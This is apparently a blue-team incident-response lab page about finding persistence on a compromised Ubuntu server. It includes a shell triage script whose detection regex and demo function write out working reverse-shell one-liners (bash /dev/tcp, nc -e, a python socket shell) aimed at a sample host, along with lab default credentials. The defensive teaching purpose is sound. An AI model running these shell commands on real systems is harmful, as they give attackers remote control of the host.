
Reverse Shell Cleanup

Difficulty

  • intermediate

Average duration

1 hr

Technologies

  • reverse-shell

  • post-exploitation

  • cybersecurity

  • linux

  • blue-team

  • threat-hunting

  • incident response


In this lab, you’ll face a live incident response scenario. A production Ubuntu server has been compromised, and it is suspected that the attackers have left behind persistent access mechanisms.

Your role as a Blue Team analyst is to inspect the environment, identify all malicious access points, and help restore control of the server.

In this lab, you will practice:

  • Post-exploitation behavior analysis
  • Using Linux commands to trace processes and files

🌱 How to start this lab

👉 This challenge uses a virtual machine designed for post-exploitation scenarios.

  1. If you don't have it yet, download the virtual machine from this link:
     https://storage.googleapis.com/cybersecurity-machines/emergency-lab.ova
  2. Import the virtual machine into VirtualBox or VMware.
  3. Start the VM and log in as the default user analyst (credentials analyst:4geeks-lab). The terminal will already be active at the beginning of the exercise.

Your Mission

You have logged into a production Ubuntu server after the monitoring team detected suspicious outbound traffic. All signs suggest that the attacker has established persistence mechanisms that remain active.

Your task is to thoroughly inspect the system, identify any malicious artifacts that keep the attacker in control, and neutralize them. Evidence indicates that the access points are carefully hidden.

Validation

Once you believe you’ve identified all four persistence mechanisms, run the following command in the terminal:

validate_lab

The system will prompt you to enter the absolute paths of the malicious files, one by one. If all paths are correct, you’ll get what you’re looking for.
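To show what "inspect the system and trace processes and files" looks like in practice, here is an added example: a small POSIX shell triage script written for this page, not the lab's own solution code. It sweeps the usual Ubuntu autostart locations (cron, systemd units, shell rc and profile files) for command fragments that reverse shells use, prints the absolute path of every file that matches (the form validate_lab asks for), and with --live also lists established TCP sessions and any process whose stdin is a socket, the signature of an interactive bash -i shell. The pattern list, the paths swept and the planted sample files in the demo are assumptions constructed for illustration; they are not artifacts from the lab VM, and the four real mechanisms may use other techniques that a pattern sweep alone will not catch.

```shell
#!/bin/sh
# Added example for this lab page (not the lab's own solution code):
# sweep the usual Linux autostart locations for reverse-shell command
# patterns, and optionally correlate with live sockets and processes.
# The pattern list and the planted sample files below are assumptions
# constructed for illustration, not artifacts from the lab VM.

# Command fragments typical of reverse shells; legitimate autostart files
# almost never contain them. The (^|[^a-z]) guards stop "rsync -e" and
# "ssh -i" from matching as "nc -e" and "sh -i".
REVSHELL_RE='/dev/(tcp|udp)/|(^|[^a-z])(ba)?sh -i|(^|[^a-z])nc(at)? .*-[ec] |socat .*exec:|mkfifo .*nc |python[0-9.]* -c .*socket'

# scan_paths PATH... : print the absolute path of every regular file under
# the given paths whose contents match REVSHELL_RE, sorted, one per line.
# Missing paths are skipped so the same call works on any host.
scan_paths() {
    for p in "$@"; do
        [ -e "$p" ] || continue
        find "$p" -type f -exec grep -lE -- "$REVSHELL_RE" {} + 2>/dev/null || true
    done | sort -u
}

# live_triage: run as root on the suspect host. Pairs the static sweep with
# what is actually running: established TCP sessions and any process whose
# stdin is a socket (what an interactive "bash -i >& /dev/tcp/..." looks like).
live_triage() {
    echo "== autostart files matching reverse-shell patterns =="
    scan_paths /etc/crontab /etc/cron.d /var/spool/cron/crontabs \
        /etc/systemd/system /lib/systemd/system /etc/rc.local \
        /etc/profile.d /etc/bash.bashrc /root /home
    echo "== established TCP connections and owning processes =="
    ss -tnp state established 2>/dev/null
    echo "== processes with a socket on stdin (pid cmdline) =="
    for proc in /proc/[0-9]*; do
        case "$(readlink "$proc/fd/0" 2>/dev/null)" in
            socket:*) printf '%s %s\n' "${proc#/proc/}" "$(tr '\0' ' ' < "$proc/cmdline")" ;;
        esac
    done
}

# plant_sample_persistence DIR: build a fake filesystem tree under DIR with
# three constructed reverse-shell artifacts and two clean files.
plant_sample_persistence() {
    mkdir -p "$1/etc/cron.d" "$1/etc/systemd/system" "$1/etc/profile.d" "$1/home/analyst"
    # planted: cron job respawning a bash /dev/tcp shell every minute
    cat > "$1/etc/cron.d/backup" <<'EOF'
* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.5/4444 0>&1'
EOF
    # planted: systemd unit disguised as a health check, runs nc -e
    cat > "$1/etc/systemd/system/net-health.service" <<'EOF'
[Service]
ExecStart=/bin/sh -c "nc -e /bin/sh 10.0.0.5 4444"
Restart=always
EOF
    # planted: python reverse shell appended to the user's .bashrc
    cat > "$1/home/analyst/.bashrc" <<'EOF'
alias ll='ls -la'
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.0.0.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);subprocess.call(["/bin/sh","-i"])' &
EOF
    # clean: benign profile script that mentions "ssh -i" (must not match)
    cat > "$1/etc/profile.d/deploy.sh" <<'EOF'
alias deploy='ssh -i ~/.ssh/deploy deploy@build.internal'
EOF
    # clean: ordinary unit file
    cat > "$1/etc/systemd/system/ssh.service" <<'EOF'
[Service]
ExecStart=/usr/sbin/sshd -D
EOF
}

# run_demo: build a throwaway tree with the constructed samples, scan it,
# print the three hits (and not the two clean files), then clean up.
run_demo() {
    tmp=$(mktemp -d)
    plant_sample_persistence "$tmp"
    scan_paths "$tmp/etc/cron.d" "$tmp/etc/systemd/system" \
               "$tmp/etc/profile.d" "$tmp/home"
    rm -rf "$tmp"
}

case "${1:-}" in
    --live) live_triage ;;
    *) run_demo ;;
esac
```

Run it with no arguments to see the demo on the constructed tree; run it as root with --live on the lab VM to sweep the real autostart locations. Treat a hit as a lead, not a verdict: open the file, check its mtime against the incident window, and confirm with the live socket and process listing that the mechanism is actually active before you remove it. Anything the sweep does not flag still has to be found by hand, since the lab states the access points are carefully hidden.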


Now it's your turn to think like a true Blue Team analyst. Recovering the server depends on you!

Good luck, Analyst!
